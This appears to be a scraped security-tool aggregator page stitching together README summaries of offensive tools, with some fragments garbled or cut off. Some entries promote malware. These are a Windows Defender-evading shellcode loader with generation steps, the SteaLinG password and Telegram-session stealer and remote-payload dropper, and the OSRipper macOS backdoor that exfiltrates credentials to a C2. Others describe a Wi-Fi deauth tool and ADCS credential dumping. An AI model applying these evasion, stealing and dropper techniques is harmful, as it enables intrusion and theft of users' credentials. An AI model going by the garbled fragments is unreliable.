If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from a files in a directory - Basic

If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items. Ensure that the option base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report and selecting Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js then giving passing -sp http://www.target.com will result in teh output http://www.target.com/path/to/example.js and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, the pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429, s403, sTO, sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile for example (separate with a space). The mobile user agent option is an combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

/XNL-h4ck3r


FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format( using either CobaltStrike or msfvenom ) for instance, in msfvenom, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode( in binary/raw format ) into a UUID string format using the Python3 script, bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • xor encrypt the UUID strings in the uuid.txt using the Python3 script, xor_encryptor.py.

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file, xor_crypted_out.txt, and paste it in the C++ file as an array of unsigned char i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}

Execution

This shellcode injection technique comprises the following subsequent steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It xor decrypts the payload using the xor key value
  • Uses UuidFromStringA to convert UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
  • Use EnumChildWindows to execute the payload previously loaded into memory( in step 1 )

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the xor key(row 86) to what you wish. This can be done in the ./xor_encryptor.py python3 script by changing the KEY variable.
  • You have to change the default executable filename value(row 90) to your filename.
  • The command for compiling is provided in the C++ file( around the top ). NB: mingw was used but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it

disclaimers:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
  • for developers
    you can read the source code and try to understand how to make a project like this

Features


module Short description
Dump password steal All passwords saved , upload file a passwords saved to mega
Dump History dump browser history
dump files Steal files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works ? The recording session in Telegram is stored locally in this particular path C:\Users<pc name >\AppData\Roaming\Telegram Desktop in the 'tedata' folder
C:
└── Users
├── .AppData
│   └── Roaming
│   └── TelegramDesktop
│   └── tdata

Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/ The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV

module
2- Dropper
  • What requirements does he need from you?
  • And how does it work?? Requirements The first thing it asks you is the URL of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct, meaning that it must be the end Its Yama .exe or .png, whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work? 

The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

AV detection


Media



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyzes are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, an IP address that has just joined the corporate network, a newly opened port, exploitable vulnerabilities can be determined, and a python application that can work integrated with Tenable Nessus has been developed to automatically identify these processes.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation cd Nessus-Automation sudo pip3 install requirements.txt

Usage

The SIEM IP address in the codes should be changed.

In order to detect a new IP address exactly, it was checked whether the phrase "Host Discovery" was used in the Nessus scan name, and the live IP addresses were recorded in the database with a timestamp, and the difference IP address was sent to SIEM. The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py

By checking the port scans made by Nessus, the port-IP-time stamp information is recorded in the database, it detects a newly opened service over the database and transmits the data to SIEM in the form of "New Port:" port-IP-time stamp. The result observed by SIEM is as follows:

Usage: python finding-new-port-nessus.py

In the findings of vulnerability scans made in institutions and organizations, primarily exploitable vulnerabilities should be closed. At the same time, it records the vulnerabilities in the database that can be exploited with metasploit in the institutions and transmits this information to SIEM when it finds a different exploitable vulnerability on the systems. Exploitable vulnerabilities observed by SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy using the HTML5 geolocation feature.


Usage

I cannot be held responsible for the malicious use of the vehicle.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



pyFlipper - Unoffical Flipper Zero Cli Wrapper Written In Python


Unoffical Flipper Zero cli wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

bluetooth info bt_info = flipper.bt.info()">
#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
device_info = flipper.device_info.info()

#Get heap info dict
heap = flipper.free.info()

#Get free_blocks string
free_blocks = flipper.free.blocks()

#Get bluetooth info
bt_info = flipper.bt.info()

Storage

Filesystem Info

#Get the storage filesystem info
ext_info = flipper.storage.info(fs="/ext")

Explorer

#Get the storage /ext dict
ext_list = flipper.storage.list(path="/ext")

#Get the storage /ext tree dict
ext_tree = flipper.storage.tree(path="/ext")

#Get file info
file_info = flipper.storage.stat(file="/ext/foo/bar.txt")

#Make directory
flipper.storage.mkdir(new_dir="/ext/foo")

Files

generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable. The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc. """ flipper.storage.write.send(text_two) time.sleep(3) #Don't forget to stop flipper.storage.write.stop()">
#Read file
plain_text = flipper.storage.read(file="/ext/foo/bar.txt")

#Remove file
flipper.storage.remove(file="/ext/foo/bar.txt")

#Copy file
flipper.storage.copy(src="/ext/foo/source.txt", dest="/ext/bar/destination.txt")

#Rename file
flipper.storage.rename(file="/ext/foo/bar.txt", new_file="/ext/foo/rab.txt")

#MD5 Hash file
md5_hash = flipper.storage.md5(file="/ext/foo/bar.txt")

#Write file in one chunk
file = "/ext/bar.txt"

text = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.file(file, text)

#Write file using a listener
file = "/ext/foo.txt"

text_one = """There are many variations of passages of Lorem Ipsum available,
but the majority have suffered alteration in some form, by injected humour,
or randomised words which don't look even slightly believable.
If you are going to use a passage of Lorem Ipsum,
you need to be sure there isn't anything embarrassing hidden in the middle of text.
"""

flipper.storage.write.start(file)

time.sleep(2)

flipper.storage.write.send(text_one)

text_two = """All the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as
necessary, making this the first true generator on the Internet.
It uses a dictionary of over 200 Latin words, combined with a handful of
model sentence structures, to generate Lorem Ipsum which looks reasonable.
The generated Lorem Ipsum is therefore always free from repetition, injected humour, or non-characteristic words etc.
"""
flipper.storage.write.send(text_two)

time.sleep(3)

#Don't forget to stop
flipper.storage.write.stop()

LED/Backlight

#Set generic led on (r,b,g,bl)
flipper.led.set(led='r', value=255)

#Set blue led off
flipper.led.blue(value=0)

#Set green led value
flipper.led.green(value=175)

#Set backlight on
flipper.led.backlight_on()

#Set backlight off
flipper.led.backlight_off()

#Turn off led
flipper.led.off()

Vibro

#Set vibro True or False
flipper.vibro.set(True)

#Set vibro on
flipper.vibro.on()

#Set vibro off
flipper.vibro.off()

GPIO

#Set gpio mode: 0 - input, 1 - output
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

#Read gpio pin value
flipper.gpio.read(pin_name=PIN_NAME)

#Set gpio pin value
flipper.gpio.mode(pin_name=PIN_NAME, value=1)

MusicPlayer

#Play song in RTTTL format
rttl_song = "Littleroot Town - Pokemon:d=4,o=5,b=100:8c5,8f5,8g5,4a5,8p,8g5,8a5,8g5,8a5,8a#5,8p,4c6,8d6,8a5,8g5,8a5,8c#6,4d6,4e6,4d6,8a5,8g5,8f5,8e5,8f5,8a5,4d6,8d5,8e5,2f5,8c6,8a#5,8a#5,8a5,2f5,8d6,8a5,8a5,8g5,2f5,8p,8f5,8d5,8f5,8e5,4e5,8f5,8g5"

#Play in loop
flipper.music_player.play(rtttl_code=rttl_song)

#Stop loop
flipper.music_player.stop()

#Play for 20 seconds
flipper.music_player.play(rtttl_code=rttl_song, duration=20)

#Beep
flipper.music_player.beep()

#Beep for 5 seconds
flipper.music_player.beep(duration=5)

NFC

#Synchronous default timeout 5 seconds

#Detect NFC
nfc_detected = flipper.nfc.detect()

#Emulate NFC
flipper.nfc.emulate()

#Activate field
flipper.nfc.field()

RFID

#Synchronous default timeout 5 seconds

#Read RFID
rfid = flipper.rfid.read()

SubGhz

#Transmit hex_key N times(default count = 10)
flipper.subghz.tx(hex_key="DEADBEEF", frequency=433920000, count=5)

#Decode raw .sub file
decoded = flipper.subghz.decode_raw(sub_file="/ext/subghz/foo.sub")

Infrared

#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




 macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open a issue and ill make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



15-Year-Old Unpatched Python Vulnerability Potentially Affects Over 350,000 Projects

As many as 350,000 open source projects are believed to be potentially vulnerable to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years. The open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, and IT management. The shortcoming,

Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm

Usage

└─# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




JuiceLedger Hackers Behind the Recent Phishing Attacks Against PyPI Users

More details have emerged about the operators behind the first-known phishing campaign specifically aimed at the Python Package Index (PyPI), the official third-party software repository for the programming language. Connecting it to a threat actor tracked as JuiceLedger, cybersecurity firm SentinelOne, along with Checkmarx, described the group as a relatively new entity that surfaced in early

Warning: PyPI Feature Executes Code Automatically After Python Package Download

In another finding that could expose developers to increased risk of a supply chain attack, it has emerged that nearly one-third of the packages in PyPI, the Python Package Index, trigger automatic code execution upon downloading them. "A worrying feature in pip/PyPI allows code to automatically run when developers are merely downloading a package," Checkmarx researcher Yehuda Gelb said in a

Autodeauth - A Tool Built To Automatically Deauth Local Networks


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of networks ssids/mac addre sses to avoid (Comma seperated)
--whitelist WHITELIST, -w WHITELIST
List of networks ssids/mac addresses to target (Comma seperated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup you are able to run the script by using autodeauth from any directory

Command line

Networks with spaces can be represented using their mac addresses

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected and fits under the whitelist/blacklist criteria its network information is saved as a json file in /var/log/autodeauth/

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Lets say you wanted the following config to be setup as a service

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.

Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).


Installation

Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:

pip install masky

The Masky agent executable is already included within the PyPi package.

